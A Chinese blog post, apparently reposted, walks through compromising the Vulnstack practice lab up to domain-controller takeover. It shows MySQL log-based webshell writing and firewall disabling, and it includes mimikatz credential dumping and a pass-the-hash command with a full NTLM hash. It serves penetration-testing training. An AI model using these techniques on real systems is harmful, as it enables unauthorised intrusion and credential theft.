暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

红日靶场(一)学习记录

zero1安全笔记 2021-11-29
3566

因为并不是一次性打完的,IP会有多次变化,内网IP不变。内网目前会的姿势不多,后面会使用这个靶场练习内网的各种攻击方法。


靶场:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/


拓扑图

目标:拿到域控权限


1.信息收集


arp扫描发现存活主机:192.168.0.122



端口扫描,发现开放80、1028和3306三个端口,数据库大概率是MySQL。



访问192.168.0.122,出现phpstudy探针页面,收集一下敏感信息,例如绝对路径。



目录和备份文件扫描,发现phpinfo和phpmyadmin,存在备份文件。



访问扫描出来的页面,收集敏感信息



查看备份文件内容,里面是网站源码,是一个cms,叫yxcms,查看日志发现版本是1.2.1



访问网站首页:http://192.168.0.122/yxcms,发现公告信息处存在网站后台地址以及账号密码。



访问后台页面



信息收集到此结束。


2.漏洞挖掘与利用


2.1 phpmyadmin弱口令&getshell


随手一试root/root进去了,弱口令get,都不用尝试爆破了。



尝试写shell到服务器,前面信息收集获得了绝对路径,查看secure_file_priv状态

select @@secure_file_priv



结果为null,也就是不允许导入导出,这里说一下secure_file_priv状态代表的含义:

secure_file_priv为null    表示不允许导入导出
secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
secure_file_priv没有设置时,则表示没有任何限制
写入文件的时候还注意php.ini里面gpc是否开启,开启的情况下,特殊字符都会被转义 ' 变成 \'

既然直接写行不通,尝试日志写shell,查看日志状态以及存储位置:

show global variables like '%general_%'



日志是关闭的,开启日志并且更改日志存储位置,尝试写一句话到shell



写入一句话,值得注意的是,一句话的两边的引号不能和post[]里面的引号一样,会引起mysql判断错误,可以是双引号和单引号结合,也可以里面不加引号。



使用蚁剑连接shell测试,连接成功,获得第一个shell。



2.2 网站后台弱口令&getshell


利用之前信息收集的弱口令登录后台,查找上传点。



在前台模板处发现可以创建php文件,写入一句话木马,创建shell1.php。



这边卡了一下,没有找到绝对路径,试了抓包、查看site map也没发现,后来想起来了备份文件里面源码应该存在路径,搜索一个之前已经存在的模板文件,查看路径进行拼接,连接蚁剑,ok,渗透的本质就是信息收集



查看有无杀软运行,估计是没有,因为简单的一句话都能执行,命令:

tasklist /svc



确认没有杀软进程,kali生成msf木马,设置监听,用蚁剑上传木马到服务器。



getuid查看权限,发现是administrator,尝试getsystem提权,提权成功,进行内网渗透。



3.内网渗透


3.1 内网信息收集


不知道什么原因,运行一些命令一直显示系统错误 1722 rpc服务不可用,在靶机win7和win2008开启rpc服务也还是报错,尝试了很多方法,命令一直报错,在另一台win2003就没问题,结果第二天再打的时候,命令又能够执行了,离谱。


先做一下进程迁移,防止session死亡,迁移到权限为system的进程。

收集网卡信息,可以看到有两个网卡,存在两个网段

ipconfig或者ipconfig /all



收集域信息,可以看到有三台机器,本机为stu1,其他两个为dev1和ROOT-TVI862UBEH,域控是OWA。


net group /domain          域内用户列表
net group "domain computers" /domain 域内计算机列表
net group "domain admins" /domain 域内管理员列表
hostname 本机名称



扫描域内存活主机,发现三个存活ip,143是本机,通过ping发现1和255不存在,用下面的命令来确定IP对用名称

ping -a 192.168.52.141
ping -a 192.168.52.138




基本可以确认138是域控的ip,对域控进行端口扫描,首先进行socks代理,添加路由,对138ip进行22,80,443,135,445端口扫描




发现开放80,135和445端口,尝试ms17-010攻击,失败。



尝试PTH拿域控,登录到win7执行操作,开启远程桌面服务

use post/windows/manage/enable_rdp
set session 1
run

关闭防火墙

netsh advfirewall set allprofiles state off

加载kiwi,抓取明文密码

load kiwi
creds_all



密码为Hongrisec@2019,登录远程桌面,注意用户名



蚁剑上传mimikatz,因为没有杀软,无需做免杀处理

运行mimikatz,执行命令,获取hash

privilege::debug
sekurlsa::msv



使用hash传递

sekurlsa::pth /domain:god.org /user:administrator /ntlm:4f1a2b2cf1dd79ae22a7f198412d7e51

执行命令成功会弹出一个cmd窗口,通过该窗口可对域控机器执行命令,拿到域控权限。






文章转载自zero1安全笔记,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论